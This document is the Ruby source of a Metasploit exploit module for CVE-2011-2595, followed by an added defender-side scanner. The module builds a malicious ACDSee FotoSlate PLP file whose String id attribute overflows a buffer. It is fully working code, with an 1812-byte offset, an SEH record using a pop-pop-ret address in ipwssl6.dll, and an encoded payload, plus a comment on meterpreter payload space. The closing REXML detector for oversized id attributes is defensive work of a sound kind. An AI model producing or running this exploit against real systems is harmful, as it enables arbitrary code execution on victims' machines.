GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ACDSee FotoSlate PLP File id Parameter Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via
        a specially crafted id parameter in a String element. When viewing a malicious
        PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a
        buffer and execute arbitrary code. This exploit has been tested on systems such as
        Windows XP SP3, Windows Vista, and Windows 7.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Parvez Anwar', # Vulnerability discovery
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2011-2595' ],
          [ 'OSVDB', '75425' ],
          [ 'BID', '49558' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          #'Space'    => 4000,
          'BadChars' => "\x00\x22"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'ACDSee FotoSlate 4.0 Build 146',
            {
              'Ret'         => 0x263a5b57, # pop, pop, ret from ipwssl6.dll
              'Offset'      => 1812,
              'TotalLength' => 5000
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-09-12',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.plp']),
      ])
  end

  def exploit

    overflow = rand_text(target["Offset"])
    overflow << generate_seh_record(target.ret)
    overflow << payload.encoded
    overflow << rand_text_alpha(target["TotalLength"] - overflow.length)

    plp =<<TEMPLATE
<?xml version="1.0" encoding="ISO-8859-1"?>
<ACDFotoSlateDocument15>
  <PageDefinition>
    <Template>
      <Version>3.0</Version>
      <Page>
        <Name>Letter</Name>
        <Properties>
          <String id="#{overflow}"></String>
          <String id="Width">8.500000IN</String>
          <String id="Height">11.000000IN</String>
          <String id="Orientation">Portrait</String>
          <Bool id="AutoRotate">FALSE</Bool>
          <Bool id="AutoFill">FALSE</Bool>
        </Properties>
        <Content>
          <Bool id="UseBGColor">FALSE</Bool>
          <Int id="BGImageType">0</Int>
          <String id="BGImageFile"></String>
          <Int id="BGColor">16777215</Int>
        </Content>
      </Page>
      <ToolList>
        <Group>
          <Tool>
            <Name>Image</Name>
            <Properties>
              <String id="XPos">0.500000IN</String>
              <String id="YPos">0.500000IN</String>
              <String id="Width">7.500000IN</String>
              <String id="Height">10.000000IN</String>
              <Float id="Tilt">0.000000</Float>
            </Properties>
            <Content>
              <Int id="ShapeType">0</Int>
              <Float id="RoundRectX">0.000000</Float>
              <Float id="RoundRectY">0.000000</Float>
              <Bool id="ShrinkToFit">FALSE</Bool>
              <Bool id="AutoRotate">FALSE</Bool>
              <Float id="BorderWidth">0.000000</Float>
              <Bool id="UseBGColor">FALSE</Bool>
              <Int id="BGColor">8454143</Int>
              <Bool id="DropShadow">FALSE</Bool>
              <Int id="DSColor">0</Int>
              <Bool id="BevelEdge">FALSE</Bool>
              <Bool id="Border">FALSE</Bool>
              <Int id="BorderColor">16711680</Int>
              <Bool id="IsLocked">FALSE</Bool>
            </Content>
          </Tool>
        </Group>
      </ToolList>
    </Template>
    <PageContent>
      <Version>3.0</Version>
      <Page>
        <Name>Letter</Name>
        <Content>
          <Bool id="UseBGColor">FALSE</Bool>
          <Int id="BGImageType">0</Int>
          <String id="BGImageFile"></String>
          <Int id="BGColor">16777215</Int>
        </Content>
      </Page>
      <ToolList>
        <Group>
          <Tool>
            <Name>Image</Name>
            <Content>
              <Int id="ShapeType">0</Int>
              <Float id="RoundRectX">0.000000</Float>
              <Float id="RoundRectY">0.000000</Float>
              <Bool id="ShrinkToFit">FALSE</Bool>
              <Bool id="AutoRotate">FALSE</Bool>
              <Float id="BorderWidth">0.000000</Float>
              <Bool id="UseBGColor">FALSE</Bool>
              <Int id="BGColor">8454143</Int>
              <Bool id="DropShadow">FALSE</Bool>
              <Int id="DSColor">0</Int>
              <Bool id="BevelEdge">FALSE</Bool>
              <Bool id="Border">FALSE</Bool>
              <Int id="BorderColor">16711680</Int>
              <Bool id="IsLocked">FALSE</Bool>
            </Content>
          </Tool>
        </Group>
      </ToolList>
    </PageContent>
  </PageDefinition>
</ACDFotoSlateDocument15>
TEMPLATE

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(plp)
  end
end


=begin
After SEH, we have ~0x23C3 bytes (9155 in decimal) of space for payload. But we need to avoid
using a long buffer in order to avoid the meterpreter possibly being broken.
=end

```
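The module's description and target table pin down the trigger condition: an `id` attribute on a `String` element that is far longer than any legitimate property name (the module pads to 1812 bytes before the SEH record, and to 5000 bytes in total). The following is an added defender-side check, not part of the Metasploit module or the rapid7 project, that parses a PLP file with Ruby's standard `REXML` and flags any element whose `id` attribute exceeds a length threshold. The threshold `MAX_ID_LENGTH`, the two embedded sample documents (one benign, one with a constructed 2000-byte `id` made of repeated `A` characters, which is a marker for testing and not a payload) and the function names are assumptions made for this example.

```ruby
require 'rexml/document'

# Assumed threshold: legitimate FotoSlate ids are short property names such as
# "Width" or "BGColor". 128 is far below the 1812-byte offset used in the
# module above, so an oversized id is caught long before it reaches that size.
MAX_ID_LENGTH = 128

# Parse PLP (XML) text and return one finding per element whose "id" attribute
# is longer than max_len. Each finding records the element name, its path in
# the document and the attribute length. A parse failure is returned as a
# single finding carrying an :error key, so callers can treat malformed input
# as suspicious rather than silently ignoring it.
def scan_plp_for_oversized_ids(xml_text, max_len = MAX_ID_LENGTH)
  doc = REXML::Document.new(xml_text)
  findings = []
  doc.each_recursive do |el|
    id = el.attributes['id']
    next if id.nil? || id.length <= max_len
    findings << { element: el.name, xpath: el.xpath, length: id.length }
  end
  findings
rescue REXML::ParseException => e
  [{ element: nil, xpath: nil, length: nil, error: e.message }]
end

# Convenience predicate: true when any oversized id (or a parse error) is found.
def suspicious_plp?(xml_text, max_len = MAX_ID_LENGTH)
  !scan_plp_for_oversized_ids(xml_text, max_len).empty?
end

# Constructed sample: a minimal, well-formed PLP page definition with ordinary ids.
BENIGN_PLP = <<XML
<?xml version="1.0" encoding="ISO-8859-1"?>
<ACDFotoSlateDocument15>
  <PageDefinition>
    <Template>
      <Version>3.0</Version>
      <Page>
        <Name>Letter</Name>
        <Properties>
          <String id="Width">8.500000IN</String>
          <String id="Height">11.000000IN</String>
          <String id="Orientation">Portrait</String>
          <Bool id="AutoRotate">FALSE</Bool>
        </Properties>
      </Page>
    </Template>
  </PageDefinition>
</ACDFotoSlateDocument15>
XML

# Constructed sample: the same structure with one String id inflated to 2000
# characters. The filler is plain "A" characters, a test marker only.
SUSPICIOUS_PLP = BENIGN_PLP.sub(
  '<String id="Width">',
  "<String id=\"#{'A' * 2000}\"></String>\n          <String id=\"Width\">"
)

if __FILE__ == $PROGRAM_NAME
  { 'benign' => BENIGN_PLP, 'suspicious' => SUSPICIOUS_PLP }.each do |label, plp|
    findings = scan_plp_for_oversized_ids(plp)
    puts "#{label}: #{findings.empty? ? 'clean' : findings.inspect}"
  end
end
```

Run as a script it reports `benign: clean` and one finding for the second sample; as a library it can be wired into a mail gateway or file-share scanner that sees `.plp` attachments. The check is deliberately structural (attribute length per element) rather than signature-based, so it does not depend on the particular bytes of any one exploit file.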